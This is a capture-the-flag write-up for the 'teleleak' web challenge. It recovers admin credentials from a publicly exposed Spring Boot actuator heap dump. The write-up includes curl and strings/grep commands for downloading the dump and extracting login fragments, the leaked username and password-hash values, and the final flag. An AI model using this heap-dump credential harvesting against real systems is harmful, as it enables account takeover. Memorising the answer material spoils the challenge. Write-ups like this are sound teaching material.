Skip to main content

teleleak

Challenge

Imported from local notes.md.

Solution

Original Notes

teleleak

Challenge Summary

  • Given: Five live TeleLeak instances and a hint to avoid noisy interaction.
  • Goal: Get into an existing account and recover the challenge flag.
  • Constraints: Be gentle with the live targets and avoid broad spraying.

Initial Recon / Triage

  • Observations:
    • All instances used the same Spring Boot login/register flow.
    • Registration was intentionally closed with a hint to access an existing account.
    • /actuator was public on teleleak.umbccd.net and exposed a public heapdump link.
  • File identification:
    • artifacts/login.html, register.html, forgotPassword.html: captured public auth pages.
    • artifacts/heapdump1.hprof: public heap dump from /actuator/heapdump.
    • artifacts/heapdump1_seed_hits.txt and related grep outputs: extracted app routes and credential clues from the heap.
  • Entry points:
    • https://teleleak.umbccd.net/actuator/heapdump
    • https://teleleak.umbccd.net/login

Hypotheses & Approach

  • Hypothesis 1: The intended bug is not login-form injection, but sensitive memory disclosure through the exposed heap dump.
  • Hypothesis 2: The heap contains recent request bodies and/or seeded user credentials that can be replayed directly against the login form.

Execution Steps (Reproducible)

Stage 1

Commands:

curl -s https://teleleak.umbccd.net/actuator
curl -s https://teleleak.umbccd.net/actuator/heapdump -o artifacts/heapdump1.hprof
strings -a artifacts/heapdump1.hprof | rg "username=|password=|seedAdmin|/admin/dashboard|/u/"

Results:

  • Confirmed public actuator access and downloaded the live heap dump.
  • Extracted multiple credential-looking request fragments from memory, including:
    • username=weiner&password=026ad9b14a7453b7488daa0c6acbc258b1506f52c441c7c465474c1a564394ff
    • username=admin&password=f374e70b2d71eb7188c0eda0b6a13d47ca5abd681118de48354f003d8af534f5
  • Extracted app routes including /admin/dashboard and /u/{username}.

Stage 2

Commands:

python3 artifacts/test_logins.py
python3 artifacts/fetch_admin.py

Results:

  • Verified weiner login succeeded and redirected to /u/weiner.
  • Verified admin login with hash f374e70b2d71eb7188c0eda0b6a13d47ca5abd681118de48354f003d8af534f5 succeeded and redirected to /admin/dashboard.
  • Fetching /admin/dashboard returned the flag directly.

Artifacts Produced

  • artifacts/heapdump1.hprof
  • artifacts/test_logins.py
  • artifacts/fetch_admin.py
  • artifacts/admin_fetch/admin__dashboard.txt

Flag

Dawgctf{w3b_m3m_Dumpz!}